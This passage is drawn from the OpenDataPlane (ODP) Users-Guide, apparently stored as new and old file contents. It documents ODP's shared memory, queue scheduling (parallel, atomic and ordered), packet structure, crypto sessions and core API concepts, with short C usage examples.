writeable and\nmapping the shared memory block. There is no fragmentation.\n\n=== Memory behaviour\nBy default ODP threads are assumed to behave as cache coherent systems:\nAny change performed on a shared memory block is guaranteed to eventually\nbecome visible to other ODP threads sharing this memory block.\n(this behaviour may be altered by flags to +odp_shm_reserve()+ in the future).\nNevertheless, there is no implicit memory barrier associated with any action\non shared memories: *When* a change performed by an ODP thread becomes visible\nto another ODP thread is not known: An application using shared memory\nblocks has to use some memory barrier provided by ODP to guarantee shared data\nvalidity between ODP threads.\n\n=== Lookup by name\nAs mentioned, shared memory handles can be sent from ODP threads to ODP\nthreads using any IPC mechanism, and then the block address retrieved.\nA simpler approach to get the shared memory block handle of an already created\nblock is to use the +odp_shm_lookup()+ API function call.\nThis nevertheless requires the calling ODP thread to provide the name of the\nshared memory block:\n+odp_shm_lookup()+ will return +ODP_SHM_INVALID+ if no shared memory block\nwith the provided name is known by ODP.\n\n.retrieving a block handle and address from another ODP task\n[source,c]\n----\n#define BLKNAME \"shared_items\"\n\nodp_shm_t shm;\nshared_data_t *shared_data;\n\nshm = odp_shm_lookup(BLKNAME);\nif (shm != ODP_SHM_INVALID) {\n\tshared_data = odp_shm_addr(shm);\n\t...\n}\n----\n\n=== Freeing memory\nFreeing shared memory is performed using the +odp_shm_free()+ API call.\n+odp_shm_free()+ takes one single argument, the shared memory block handle.\nAny ODP thread is allowed to perform a +odp_shm_free()+ on a shared memory\nblock (i.e. the thread performing the +odp_shm_free()+ may be different\nfrom the thread which did the +odp_shm_reserve()+). Shared memory blocks should\nbe freed only once, and once freed, a shared memory block should no longer\nbe referenced by any ODP threads.\n\n.freeing a shared memory block\n[source,c]\n----\nif (odp_shm_free(shm) != 0) {\n\t...\/\/handle error\n}\n----\n\n=== Memory creation flags\nThe last argument to odp_shm_reserve() is a set of ORed flags.\nTwo flags are supported:\n\n==== ODP_SHM_PROC\nWhen this flag is given, the allocated shared memory will become visible\noutside ODP. Non ODP threads (e.g. usual linux process or linux threads)\nwill be able to access the memory using native (non ODP) OS calls such as\n'shm_open()' and 'mmap' (for linux).\nEach ODP implementation should provide a description on exactly how\nthis mapping should be done on that specific platform.\n\n==== ODP_SHM_SW_ONLY\nThis flag tells ODP that the shared memory will be used by the ODP application\nsoftware only: no HW (such as DMA, or other accelerator) will ever\ntry to access the memory. No other ODP call will be involved on this memory\n(as ODP calls could implicitly involve HW, depending on the ODP\nimplementation), except for +odp_shm_lookup()+ and +odp_shm_free()+.\nODP implementations may use this flag as a hint for performance optimization,\nor may as well ignore this flag.\n\n== Queues\nQueues are the fundamental event sequencing mechanism provided by ODP and all\nODP applications make use of them either explicitly or implicitly. Queues are\ncreated via the 'odp_queue_create()' API that returns a handle of type\n+odp_queue_t+ that is used to refer to this queue in all subsequent APIs that\nreference it. Queues have one of two ODP-defined _types_, POLL, and SCHED that\ndetermine how they are used. POLL queues directly managed by the ODP\napplication while SCHED queues make use of the *ODP scheduler* to provide\nautomatic scalable dispatching and synchronization services.\n\n.Operations on POLL queues\n[source,c]\n----\nodp_queue_t poll_q1 = odp_queue_create(\"poll queue 1\", ODP_QUEUE_TYPE_POLL, NULL);\nodp_queue_t poll_q2 = odp_queue_create(\"poll queue 2\", ODP_QUEUE_TYPE_POLL, NULL);\n...\nodp_event_t ev = odp_queue_deq(poll_q1);\n...do something\nint rc = odp_queue_enq(poll_q2, ev);\n----\n\nThe key distinction is that dequeueing events from POLL queues is an\napplication responsibility while dequeueing events from SCHED queues is the\nresponsibility of the ODP scheduler.\n\n.Operations on SCHED queues\n[source,c]\n----\nodp_queue_param_t qp;\nodp_queue_param_init(&qp);\nodp_schedule_prio_t prio = ...;\nodp_schedule_group_t sched_group = ...;\nqp.sched.prio = prio;\nqp.sched.sync = ODP_SCHED_SYNC_[NONE|ATOMIC|ORDERED];\nqp.sched.group = sched_group;\nqp.lock_count = n; \/* Only relevant for ordered queues *\/\nodp_queue_t sched_q1 = odp_queue_create(\"sched queue 1\", ODP_QUEUE_TYPE_SCHED, &qp);\n\n...thread init processing\n\nwhile (1) {\n odp_event_t ev;\n odp_queue_t which_q;\n ev = odp_schedule(&which_q, <wait option>);\n ...process the event\n}\n----\n\nWith scheduled queues, events are sent to a queue, and the sender chooses\na queue based on the service it needs. The sender does not need to know\nwhich ODP thread (on which core) or hardware accelerator will process\nthe event, but all the events on a queue are eventually scheduled and processed.\n\nAs can be seen, SCHED queues have additional attributes that are specified at\nqueue create that control how the scheduler is to process events contained\non them. These include group, priority, and synchronization class.\n\n=== Scheduler Groups\nThe scheduler's dispatching job is to return the next event from the highest\npriority SCHED queue that the caller is eligible to receive events from.\nThis latter consideration is determined by the queues _scheduler group_, which\nis set at queue create time, and by the caller's _scheduler group mask_ that\nindicates which scheduler group(s) it belongs to. Scheduler groups are\nrepresented by handles of type +odp_scheduler_group_t+ and are created by\nthe *odp_scheduler_group_create()* API. A number of scheduler groups are\n_predefined_ by ODP. These include +ODP_SCHED_GROUP_ALL+ (all threads),\n+ODP_SCHED_GROUP_WORKER+ (all worker threads), and +ODP_SCHED_GROUP_CONTROL+\n(all control threads). The application is free to create additional scheduler\ngroups for its own purpose and threads can join or leave scheduler groups\nusing the *odp_scheduler_group_join()* and *odp_scheduler_group_leave()* APIs\n\n=== Scheduler Priority\nThe +prio+ field of the +odp_queue_param_t+ specifies the queue's scheduling\npriority, which is how queues within eligible scheduler groups are selected\nfor dispatch. Queues have a default scheduling priority of NORMAL but can be\nset to HIGHEST or LOWEST according to application needs.\n\n=== Scheduler Synchronization\nIn addition to its dispatching function, which provide automatic scalability to\nODP applications in many core environments, the other main function of the\nscheduler is to provide event synchronization services that greatly simplify\napplication programming in a parallel processing environment. A queue's\nSYNC mode determines how the scheduler handles the synchronization processing\nof multiple events originating from the same queue.\n\nThree types of queue scheduler synchronization area supported: Parallel,\nAtomic, and Ordered.\n\n==== Parallel Queues\nSCHED queues that specify a sync mode of ODP_SCHED_SYNC_NONE are unrestricted\nin how events are processed.\n\n.Parallel Queue Scheduling\nimage::parallel_queue.svg[align=\"center\"]\n\nAll events held on parallel queues are eligible to be scheduled simultaneously\nand any required synchronization between them is the responsibility of the\napplication. Events originating from parallel queues thus have the highest\nthroughput rate, however they also potentially involve the most work on the\npart of the application. In the Figure above, four threads are calling\n*odp_schedule()* to obtain events to process. The scheduler has assigned\nthree events from the first queue to three threads in parallel. The fourth\nthread is processing a single event from the third queue. The second queue\nmight either be empty, of lower priority, or not in a scheduler group matching\nany of the threads being serviced by the scheduler.\n\n=== Atomic Queues\nAtomic queues simplify event synchronization because only a single thread may\nprocess event(s) from a given atomic queue at a time. Events scheduled from\natomic queues thus can be processed lock free because the locking is being\ndone implicitly by the scheduler. Note that the caller may receive one or\nmore events from the same atomic queue if *odp_schedule_multi()* is used. In\nthis case these multiple events all share the same atomic scheduling context.\n\n.Atomic Queue Scheduling\nimage::atomic_queue.svg[align=\"center\"]\n\nIn this example, no matter how many events may be held in an atomic queue,\nonly one calling thread can receive scheduled events from it at a time. Here\ntwo threads process events from two different atomic queues. Note that there\nis no synchronization between different atomic queues, only between events\noriginating from the same atomic queue. The queue context associated with the\natomic queue is held until the next call to the scheduler or until the\napplication explicitly releases it via a call to\n*odp_schedule_release_atomic()*.\n\nNote that while atomic queues simplify programming, the serial nature of\natomic queues may impair scaling.\n\n=== Ordered Queues\nOrdered queues provide the best of both worlds by providing the inherent\nscalability of parallel queues, with the easy synchronization of atomic\nqueues.\n\n.Ordered Queue Scheduling\nimage::ordered_queue.svg[align=\"center\"]\n\nWhen scheduling events from an ordered queue, the scheduler dispatches multiple\nevents from the queue in parallel to different threads, however the scheduler\nalso ensures that the relative sequence of these events on output queues\nis identical to their sequence from their originating ordered queue.\n\nAs with atomic queues, the ordering guarantees associated with ordered queues\nrefer to events originating from the same queue, not for those originating on\ndifferent queues. Thus in this figure three thread are processing events 5, 3,\nand 4, respectively from the first ordered queue. Regardless of how these\nthreads complete processing, these events will appear in their original\nrelative order on their output queue.\n\n==== Order Preservation\nRelative order is preserved independent of whether events are being sent to\ndifferent output queues. For example, if some events are sent to output queue\nA while others are sent to output queue B then the events on these output\nqueues will still be in the same relative order as they were on their\noriginating queue. Similarly, if the processing consumes events so that no\noutput is issued for some of them (_e.g.,_ as part of IP fragment reassembly\nprocessing) then other events will still be correctly ordered with respect to\nthese sequence gaps. Finally, if multiple events are enqueued for a given\norder (_e.g.,_ as part of packet segmentation processing for MTU\nconsiderations), then each of these events will occupy the originator's\nsequence in the target output queue(s). In this case the relative order of these\nevents will be in the order that the thread issued *odp_queue_enq()* calls for\nthem.\n\nThe ordered context associated with the dispatch of an event from an ordered\nqueue lasts until the next scheduler call or until explicitly released by\nthe thread calling *odp_schedule_release_ordered()*. This call may be used\nas a performance advisory that the thread no longer requires ordering\nguarantees for the current context. As a result, any subsequent enqueues\nwithin the current scheduler context will be treated as if the thread was\noperating in a parallel queue context.\n\n==== Ordered Locking\nAnother powerful feature of the scheduler's handling of ordered queues is\n*ordered locks*. Each ordered queue has associated with it a number of ordered\nlocks as specified by the _lock_count_ parameter at queue create time.\n\nOrdered locks provide an efficient means to perform in-order sequential\nprocessing within an ordered context. For example, supposed events with relative\norder 5, 6, and 7 are executing in parallel by three different threads. An\nordered lock will enable these threads to synchronize such that they can\nperform some critical section in their originating queue order. The number of\nordered locks supported for each ordered queue is implementation dependent (and\nqueryable via the *odp_config_max_ordered_locks_per_queue()* API). If the\nimplementation supports multiple ordered locks then these may be used to\nprotect different ordered critical sections within a given ordered context.\n\n==== Summary: Ordered Queues\nTo see how these considerations fit together, consider the following code:\n\n.Processing with Ordered Queues\n[source,c]\n----\nvoid worker_thread()\n odp_init_local();\n ...other initialization processing\n\n while (1) {\n ev = odp_schedule(&which_q, ODP_SCHED_WAIT);\n ...process events in parallel\n odp_schedule_order_lock(0);\n ...critical section processed in order\n odp_schedule_order_unlock(0);\n ...continue processing in parallel\n odp_queue_enq(dest_q, ev);\n }\n}\n----\n\nThis represents a simplified structure for a typical worker thread operating\non ordered queues. Multiple events are processed in parallel and the use of\nordered queues ensures that they will be placed on +dest_q+ in the same order\nas they originated. While processing in parallel, the use of ordered locks\nenables critical sections to be processed in order within the overall parallel\nflow. When a thread arrives at the *odp_schedule_order_lock()* call, it waits\nuntil the locking order for this lock for all prior events has been resolved\nand then enters the critical section. The *odp_schedule_order_unlock()* call\nreleases the critical section and allows the next order to enter it.\n\n=== Queue Scheduling Summary\n\nNOTE: Both ordered and parallel queues improve throughput over atomic queues\ndue to parallel event processing, but require that the application take\nsteps to ensure context data synchronization if needed.\n\n== Packet Processing\nODP applications are designed to process packets, which are the basic unit of\ndata of interest in the data plane. To assist in processing packets, ODP\nprovides a set of APIs that enable applications to examine and manipulate\npacket data and metadata. Packets are referenced by an abstract *odp_packet_t*\nhandle defined by each implementation.\n\nPacket objects are normally created at ingress when they arrive at a source\n*odp_pktio_t* and are received by an application either directly or (more\ntypically) for a scheduled receive queue. They MAY be implicitly freed when\nthey are transmitted to an output *odp_pktio_t* via an associated transmit\nqueue, or freed directly via the +odp_packet_free()+ API.\n\nOccasionally an application may originate a packet itself, either _de novo_ or\nby deriving it from an existing packet, and APIs are provided to assist in\nthese cases as well. Application-created packets can be recycled back through\na _loopback interface_ to reparse and reclassify them, or the application can\ndo its own parsing as desired.\n\nVarious attributes associated with a packet, such as parse results, are\nstored as metadata and APIs are provided to permit applications to examine\nand\/or modify this information.\n\n=== Packet Structure and Concepts\nA _packet_ consists of a sequence of octets conforming to an architected\nformat, such as Ethernet, that can be received and transmitted via the ODP\n*pktio* abstraction. Packets of a _length_, which is the number of bytes in\nthe packet. Packet data in ODP is referenced via _offsets_ since these reflect\nthe logical contents and structure of a packet independent of how particular\nODP implementations store that data.\n\nThese concepts are shown in the following diagram:\n\n.ODP Packet Structure\nimage::..\/images\/packet.svg[align=\"center\"]\n\nPacket data consists of zero or more _headers_ followed by 0 or more bytes of\n_payload_, followed by zero or more _trailers_. Shown here are various APIs\nthat permit applications to examine and navigate various parts of a packet and\nto manipulate its structure.\n\nTo support packet manipulation, predefined _headroom_ and _tailroom_\nareas are logically associated with a packet. Packets can be adjusted by\n_pulling_ and _pushing_ these areas. Typical packet processing might consist\nof stripping headers from a packet via +odp_pull_head()+ calls as part of\nreceive processing and then replacing them with new headers via\n+odp_push_head()+ calls as the packet is being prepared for transmit.\n\n=== Packet Segments and Addressing\nODP platforms use various methods and techniques to store and process packets\nefficiently. These vary considerably from platform to platform, so to ensure\nportability across them ODP adopts certain conventions for referencing\npackets.\n\nODP APIs use a handle of type *odp_packet_t* to refer to packet objects.\nAssociated with packets are various bits of system metadata that describe the\npacket. By referring to the metadata, ODP applications accelerate packet\nprocessing by minimizing the need to examine packet data. This is because the\nmetadata is populated by parsing and classification functions that are coupled\nto ingress processing that occur prior to a packet being presented to the\napplication via the ODP scheduler.\n\nWhen an ODP application needs to examine the contents of a packet, it requests\naddressability to it via an API call that makes the packet (or a contiguously\naddressable _segment_ of it) available for coherent access by the application.\nTo ensure portability, ODP applications assume that the underlying\nimplementation stores packets in _segments_ of implementation-defined\nand managed size. These represent the contiguously addressable portions of a\npacket that the application may refer to via normal memory accesses. ODP\nprovides APIs that allow applications to operate on packet segments in an\nefficient and portable manner as needed. By combining these with the metadata\nprovided by packets, ODP applications can operate in a fully\nplatform-independent manner while still achieving optimal performance across\nthe range of platforms that support ODP.\n\nThe use of segments for packet addressing and their relationship to metadata\nis shown in this diagram:\n\n.ODP Packet Segmentation\nimage::..\/images\/segment.svg[align=\"center\"]\n\nThe packet metadata is set during parsing and identifies the starting offsets\nof the various headers in the packet. The packet itself is physically stored\nas a sequence of segments that area managed by the ODP implementation.\nSegment 0 is the first segment of the packet and is where the packet's headroom\nand headers typically reside. Depending on the length of the packet,\nadditional segments may be part of the packet and contain the remaining packet\npayload and tailroom. The application need not concern itself with segments\nexcept that when the application requires addressability to a packet it\nunderstands that addressability is provided on a per-segment basis. So, for\nexample, if the application makes a call like +odp_packet_l4_ptr()+ to obtain\naddressability to the packet's Layer 4 header, the returned length from that\ncall is the number of bytes from the start of the Layer 4 header that are\ncontiguously addressable to the application from the returned pointer address.\nThis is because the following byte occupies a different segment and may be\nstored elsewhere. To obtain access to those bytes, the application simply\nrequests addressability to that offset and it will be able to address the\npacket bytes that occupy the next segment, etc. Note that the returned\nlength for any packet addressability call is always the lesser of the remaining\npacket length or size of its containing segment. So a mapping for segment 2\nin the above figure, for example, would return a length that extends only to\nthe end of the packet since the remaining bytes are part of the tailroom\nreserved for the packet and are not usable by the application until made\navailable to it by an appropriate API call.\n\n=== Metadata Processing\nAs noted, packet metadata is normally set by the parser as part of\nclassification that occurs during packet receive processing. It is important\nto note that this metadata may be changed by the application to reflect\nchanges in the packet contents and\/or structure as part of its processing of\nthe packet. While changing this metadata may effect some ODP APIs, changing\nmetadata is designed to _document_ application changes to the packet but\ndoes not in itself _cause_ those changes to be made. For example, if an\napplication changes the Layer 3 offset by using the +odp_packet_l3_offset_set()+\nAPI, the subsequent calls to +odp_packet_l3_ptr()+ will return an address\nstarting from that changed offset, changing an attribute like\n+odp_packet_has_udp_set()+ will not, by itself, turn a non-UDP packet into\na valid UDP packet. Applications are expected to exercise appropriate care\nwhen changing packet metadata to ensure that the resulting metadata changes\nreflect the actual changed packet structure that the application has made.\n\n== Cryptographic services\n\nODP provides support for cryptographic operations required by various security\nprotocols (e.g. IPSec). To apply a cryptographic operation to a packet a session\nmust be created first. Packets processed by a session share the same cryptographic\nparameters like algorithms, keys, initialization vectors. A session is created with\n*odp_crypto_session_create()* call. After session creation a cryptographic operation\ncan be applied to a packet using *odp_crypto_operation()* call.\nDepending on the session type - synchronous or asynchronous the operation returns\nwhen the operation completed or after the request has been submitted. In the\nasynchronous case an operation completion event will be enqueued on the session\ncompletion queue. The completion event conveys the status of the operation and\nthe result. The application has the responsibility to free the completion event.\nThe operation arguments specify for each packet the areas which are to be encrypted\nor decrypted and authenticated. Also, in asynchronous case a context can be\nassociated with a given operation and when the operation completion event is\nretrieved the associated context can be retrieved. An operation can be executed\nin-place, when the output packet is the same as the input packet or the output\npacket can be a new packet provided by the application or allocated by the\nimplementation from the session output pool.\n\ninclude::..\/glossary.adoc[]\n","old_contents":":doctitle: OpenDataPlane (ODP) Users-Guide\n:description: This document is intended to guide a new OpenDataPlane +\napplication developer.\n:imagesdir: ..\/images\n:toc:\n\n:numbered!:\n[abstract]\nAbstract\n--------\nThis document is intended to guide a new ODP application developer.\nFurther details about ODP may be found at the http:\/\/opendataplane.org[ODP]\nhome page.\n\n.Overview of a system running ODP applications\nimage::overview.svg[align=\"center\"]\n\nODP is an API specification that allows many implementations to provide\nplatform independence, automatic hardware acceleration and CPU scaling to\nhigh performance networking applications. This document describes how to\nwrite an application that can successfully take advantage of the API.\n\n:numbered:\n== Introduction\n.OpenDataPlane Components\nimage::odp_components.svg[align=\"center\"]\n\n.The ODP API Specification\nODP consists of three separate but related component parts. First, ODP is an\nabstract API specification that describes a functional model for\ndata plane applications. This specification covers many common data plane\napplication programming needs, such as the ability to receive, manipulate, and\ntransmit packet data, without specifying how these functions are performed. This\nis quite intentional. It is precisely because ODP APIs do not have a preferred\nembodiment that they permit innovation in how these functions can\nbe realized on various platforms that offer implementations of ODP. To achieve\nthis goal, ODP APIs are described using abstract data types whose definition\nis left up to the ODP implementer. For example, in ODP packets are referenced\nby abstract handles of type +odp_packet_t+, and packet-related APIs take\narguments of this type. What an +odp_packet_t+ actually is is not part of the\nODP API specification--that is the responsibility of each ODP implementation.\n\n.Summary: ODP API attributes:\n* Open Source, open contribution, BSD-3 licensed.\n* Vendor and platform neutral.\n* Application-centric. Covers functional needs of data plane applications.\n* Ensures portability by specifying the functional behavior of ODP.\n* Defined jointly and openly by application writers and platform implementers.\n* Architected to be implementable on a wide range of platforms efficiently\n* Sponsored, governed, and maintained by the Linaro Networking Group (LNG)\n\n.ODP Implementations\nSecond, ODP consists of multiple implementations of this API specification,\neach tailored to a specific target platform. ODP implementations determine\nhow each ODP abstract type is represented on that platform and how each ODP\nAPI is realized. On some platforms, ODP APIs will\nbe realized using specialized instructions that accelerate the functional\nbehavior specified by the API. On others, hardware co-processing engines may\ncompletely offload the API so that again it can be performed with little or no\ninvolvement by a CPU. In all cases, the application sees the same\nfunctional behavior independent of how a given platform has chosen to realize\nit. By allowing each platform the freedom to determine how best to realize each\nAPI's specified functional behavior in an optimal manner, ODP permits\napplications written to its APIs to take full advantage of the unique\ncapabilities of each platform without the application programmer needing to\nhave specialist knowledge of that platform or to be concerned with how best\nto tune the application to a particular platform. This latter consideration is\nparticularly important in Network Function Virtualization (NFV) environments\nwhere the application will run on a target platform chosen by someone else.\n\n.Summary: ODP Implementation Characteristics\n* One size does not fit all--supporting multiple implementations allows ODP\nto adapt to widely differing internals among platforms.\n* Anyone can create an ODP implementation tailored to their platform\n* Distribution and maintenance of each implementation is as owner wishes\n - Open source or closed source as business needs determine\n - Have independent release cycles and service streams\n* Allows HW and SW innovation in how ODP APIs are implemented on each platform.\n\n.Reference Implementations\nTo make it easy to get started with implementing ODP on a new platform, ODP\nsupplies a number of _reference implementations_ that can serve as a\nstarting point. The two primary references implementations supplied by ODP are\n*odp-linux* and *odp-dpdk*\n\n.odp-linux\nThe *odp-linux* reference implementation is a pure SW implementation of the\nODP API that relies only on the Linux programming API. As a functional model\nfor ODP, it enables ODP to be bootstrapped easily to any platform that\nsupports a Linux kernel.\n\n.odp-dpdk\nThe *odp-dpdk* reference implementation is a pure SW implementation of the\nODP API that uses http:\/\/dpdk.org[DPDK] as a SW accelerator. In particular,\n*odp-dpdk* offers superior I\/O performance for systems that use NICs, allowing\nODP applications to take immediate full advantage of the various NIC device\ndrivers supported by DPDK.\n\n.Summary: ODP Reference Implementations\n* Open source, open contribution, BSD-3 licensed.\n* Provide easy bootstrapping of ODP onto new platforms\n* Implementers free to borrow or tailor code as needed for their platform\n* Implementers retain full control over their implementations whether or not\nthey are derived from a reference implementation.\n\n.ODP Validation Test Suite\nThird, to ensure consistency between different ODP implementations, ODP\nconsists of a validation suite that verifies that any given implementation of\nODP faithfully provides the specified functional behavior of each ODP API.\nAs a separate open source component, the validation suite may be used by\napplication writers, system integrators, and platform providers alike to\nconfirm that any purported implementation of ODP does indeed conform to the\nODP API specification.\n\n.Summary: ODP Validation Test Suite\n* Synchronized with ODP API specification\n* Maintained and distributed by LNG\n* Open source, open contribution, BSD-3 licensed.\n* Key to ensuring application portability across all ODP implementations\n* Tests that ODP implementations conform to the specified functional behavior\nof ODP APIs.\n* Can be run at any time by users and vendors to validate implementations\nof ODP.\n\n=== ODP API Specification Versioning\nAs an evolving standard, the ODP API specification is released under an\nincrementing version number, and corresponding implementations of ODP, as well\nas the validation suite that verifies API conformance, are linked to this\nversion number. ODP versions are specified using a standard three-level\nnumber (major.minor.fixlevel) that are incremented according to the degree of\nchange the level represents. Increments to the fix level represent clarification\nof the specification or other minor changes that do not affect either the\nsyntax or semantics of the specification. Such changes in the API specification\nare expected to be rare. Increments to the minor level\nrepresent the introduction of new APIs or functional capabilities, or changes\nto he specified syntax or functional behavior of APIs and thus may require\napplication source code changes. Such changes are well documented in the\nrelease notes for each revision of the specification. Finally, increments to\nthe major level represent significant structural changes that most likely\nrequire some level of application source code change, again as documented in\nthe release notes for that version.\n\n=== ODP Implementation Versioning\nODP implementations are free to use whatever release naming\/numbering\nconventions they wish, as long as it is clear what level of the ODP API a given\nrelease implements. A recommended convention is to use the same three level\nnumbering scheme where the major and minor numbers correspond to the ODP API\nlevel and the fix level represents an implementation-defined service level\nassociated with that API level implementation. The LNG-supplied ODP reference\nimplementations follow this convention.\n\n=== ODP Validation Test Suite Versioning\nThe ODP validation test suite follows these same naming conventions. The major\nand minor release numbers correspond to the ODP API level that the suite\nvalidates and the fix level represents the service level of the validation\nsuite itself for that API level.\n\n=== ODP Design Goals\nODP has three primary goals that follow from its component structure. The first\nis application portability across a wide range of platforms. These platforms\ndiffer in terms of processor instruction set architecture, number and types of\napplication processing cores, memory organization, as well as the number and\ntype of platform specific hardware acceleration and offload features that\nare available. ODP applications can move from one conforming implementation\nto another with at most a recompile.\n\nSecond, ODP is designed to permit data plane applications to avail themselves\nof platform-specific features, including specialized hardware accelerators,\nwithout specialized programming. This is achieved by separating the API\nspecification from their implementation on individual platforms. Since each\nplatform implements each ODP API in a manner optimal to that platform,\napplications automatically gain the benefit of such optimizations without the\nneed for explicit programming.\n\nThird, ODP is designed to allow applications to scale out automatically to\nsupport many core architectures. This is done using an event based programming\nmodel that permits applications to be written to be independent of the number\nof processing cores that are available to realize application function. The\nresult is that an application written to this model does not require redesign\nas it scales from 4, to 40, to 400 cores.\n\n== Organization of this Document\nThis document is organized into several sections. The first presents a high\nlevel overview of the ODP API component areas and their associated abstract\ndata types. This section introduces ODP APIs at a conceptual level.\nThe second provides a tutorial on the programming model(s)\nsupported by ODP, paying particular attention to the event model as this\nrepresents the preferred structure for most ODP applications. This section\nbuilds on the concepts introduced in the first section and shows how ODP\napplications are structured to best realize the three ODP design goals\nmentioned earlier. The third section provides a more detailed overview of\nthe major ODP API components and is designed to serve as a companion to the\nfull reference specification for each API. The latter is intended to be used\nby ODP application programmers, as well as implementers, to understand the\nprecise syntax and semantics of each API.\n\n== ODP API Concepts\nODP programs are built around several conceptual structures that every\napplication programmer needs to be familiar with to use ODP effectively. The\nmain ODP concepts are:\nThread, Event, Queue, Pool, Shared Memory, Buffer, Packet, PktIO, Time, Timer,\nand Synchronizer.\n\n=== Thread\nThe thread is the fundamental programming unit in ODP. ODP applications are\norganized into a collection of threads that perform the work that the\napplication is designed to do. ODP threads may or may not share memory with\nother threads--that is up to the implementation. Threads come in two \"flavors\":\ncontrol and worker, that are represented by the abstract type\n+odp_thread_type_t+.\n\nA control thread is a supervisory thread that organizes\nthe operation of worker threads. Worker threads, by contrast, exist to\nperform the main processing logic of the application and employ a run to\ncompletion model. Worker threads, in particular, are intended to operate on\ndedicated processing cores, especially in many core processing environments,\nhowever a given implementation may multitask multiple threads on a single\ncore if desired (typically on smaller and lower performance target\nenvironments).\n\nIn addition to thread types, threads have associated _attributes_ such as\n_thread mask_ and _scheduler group_ that determine where they can run and\nthe type of work that they can handle. These will be discussed in greater\ndetail later.\n\n=== Event\nEvents are what threads process to perform their work. Events can represent\nnew work, such as the arrival of a packet that needs to be processed, or they\ncan represent the completion of requests that have executed asynchronously.\nEvents can also represent notifications of the passage of time, or of status\nchanges in various components of interest to the application. Events have an\nevent type that describes what it represents. Threads can create new events\nor consume events processed by them, or they can perform some processing on\nan event and then pass it along to another component for further processing.\nReferences to events are via handles of abstract type +odp_event_t+. Cast\nfunctions are provided to convert these into specific handles of the\nappropriate type represented by the event.\n\n=== Queue\nA queue is a message passing channel that holds events. Events can be\nadded to a queue via enqueue operations or removed from a queue via dequeue\noperations. The endpoints of a queue will vary depending on how it is used.\nQueues come in two major types: polled and scheduled, which will be\ndiscussed in more detail when the event model is introduced. Queues may also\nhave an associated context, which represents a persistent state for all\nevents that make use of it. These states are what permit threads to perform\nstateful processing on events as well as stateless processing.\n\nQueues are represented by handles of abstract type +odp_queue_t+.\n\n=== Pool\nA pool is a shared memory area from which elements may be drawn. Pools\nrepresent the backing store for events, among other things. Pools are\ntypically created and destroyed by the application during initialization and\ntermination, respectively, and then used during processing. Pools may be\nused by ODP components exclusively, by applications exclusively, or their\nuse may be shared between the two. Pools have an associated type that\ncharacterizes the elements that they contain. The two most important pool types\nare Buffer and Packet.\n\nPools are represented by handles of abstract type +odp_pool_t+.\n\n=== Shared Memory\nShared memory represents raw blocks of storage that are sharable between\nthreads. They are the building blocks of pools but can be used directly by\nODP applications if desired.\n\nShared memory is represented by handles of abstract type +odp_shm_t+.\n\n=== Buffer\nA buffer is a fixed sized block of shared storage that is used by ODP\ncomponents and\/or applications to realize their function. Buffers contain\nzero or more bytes of application data as well as system maintained\nmetadata that provide information about the buffer, such as its size or the\npool it was allocated from. Metadata is an important ODP concept because it\nallows for arbitrary amounts of side information to be associated with an\nODP object. Most ODP objects have associated metadata and this metadata is\nmanipulated via accessor functions that act as getters and setters for\nthis information. Getter access functions permit an application to read\na metadata item, while setter access functions permit an application to write\na metadata item. Note that some metadata is inherently read only and thus\nno setter is provided to manipulate it. When object have multiple metadata\nitems, each has its own associated getter and\/or setter access function to\ninspect or manipulate it.\n\nBuffers are represented by handles of abstract type +odp_buffer_t+.\n\n=== Packet\nPackets are received and transmitted via I\/O interfaces and represent\nthe basic data that data plane applications manipulate.\nPackets are drawn from pools of type +ODP_POOL_PACKET+.\nUnlike buffers, which are simple objects,\nODP packets have a rich set of semantics that permit their inspection\nand manipulation in complex ways to be described later. Packets also support\na rich set of metadata as well as user metadata. User metadata permits\napplications to associate an application-determined amount of side information\nwith each packet for its own use.\n\nPackets are represented by handles of abstract type +odp_packet_t+.\n\n=== PktIO\nPktIO is how ODP represents I\/O interfaces. A pktio object is a logical\nport capable of receiving and\/or transmitting packets. This may be directly\nsupported by the underlying platform as an integrated feature,\nor may represent a device attached via a PCIE or other bus.\n\nPktIOs are represented by handles of abstract type +odp_pktio_t+.\n\n=== Time\nThe time API is used to measure time intervals and track time flow of an\napplication and presents a convenient way to get access to a time source.\nThe time API consists of two main parts: local time API and global time API.\n\n==== Local time\nThe local time API is designed to be used within one thread and can be faster\nthan the global time API. The local time API cannot be used between threads as\ntime consistency is not guaranteed, and in some cases that's enough.\nSo, local time stamps are local to the calling thread and must not be shared\nwith other threads. Current local time can be read with +odp_time_local()+.\n\n==== Global time\nThe global time API is designed to be used for tracking time between threads.\nSo, global time stamps can be shared between threads. Current global time can\nbe read with +odp_time_global()+.\n\nBoth, local and global time is not wrapped during the application life cycle.\nThe time API includes functions to operate with time, such as +odp_time_diff()+,\n+odp_time_sum()+, +odp_time_cmp()+, conversion functions like\n+odp_time_to_ns()+, +odp_time_local_from_ns()+, +odp_time_global_from_ns()+.\nTo get rate of time source +odp_time_local_res()+, +odp_time_global_res()+\nare used. To wait, +odp_time_wait_ns()+ and +odp_time_wait_until()+ are used,\nduring witch a thread potentially busy loop the entire wait time.\n\nThe +odp_time_t+ opaque type represents local or global timestamps.\n\n=== Timer\nTimers are how ODP applications measure and respond to the passage of time.\nTimers are drawn from specialized pools called timer pools that have their\nown abstract type (+odp_timer_pool_t+). Applications may have many timers\nactive at the same time and can set them to use either relative or absolute\ntime. When timers expire they create events of type +odp_timeout_t+, which\nserve as notifications of timer expiration.\n\n=== Synchronizer\nMultiple threads operating in parallel typically require various\nsynchronization services to permit them to operate in a reliable and\ncoordinated manner. ODP provides a rich set of locks, barriers, and similar\nsynchronization primitives, as well as abstract types for representing various\ntypes of atomic variables. The ODP event model also makes use of queues to\navoid the need for explicit locking in many cases. This will be discussed\nin the next section.\n\n== ODP Components ==\nBuilding on ODP concepts, ODP offers several components that relate to the\nflow of work through an ODP application. These include the Classifier,\nScheduler, and Traffic Manager. These components relate to the three\nmain stages of packet processing: Receive, Process, and Transmit.\n\n=== Classifier\nThe *Classifier* provides a suite of APIs that control packet receive (RX)\nprocessing.\n\n.ODP Receive Processing with Classifier\nimage::odp_rx_processing.svg[align=\"center\"]\n\nThe classifier provides two logically related services:\n[horizontal]\nPacket parsing:: Verifying and extracting structural information from a\nreceived packet.\n\nPacket classification:: Applying *Pattern Matching Rules (PMRs)* to the\nparsed results to assign an incoming packet to a *Class of Service (CoS)*.\n\nCombined, these permit incoming packets to be sorted into *flows*, which are\nlogically related sequences of packets that share common processing\nrequirements. While many data plane applications perform stateless packet\nprocessing (_e.g.,_ for simple forwarding) others perform stateful packet\nprocessing. Flows anchor state information relating to these groups of\npackets.\n\nA CoS determines two variables for packets belonging to a 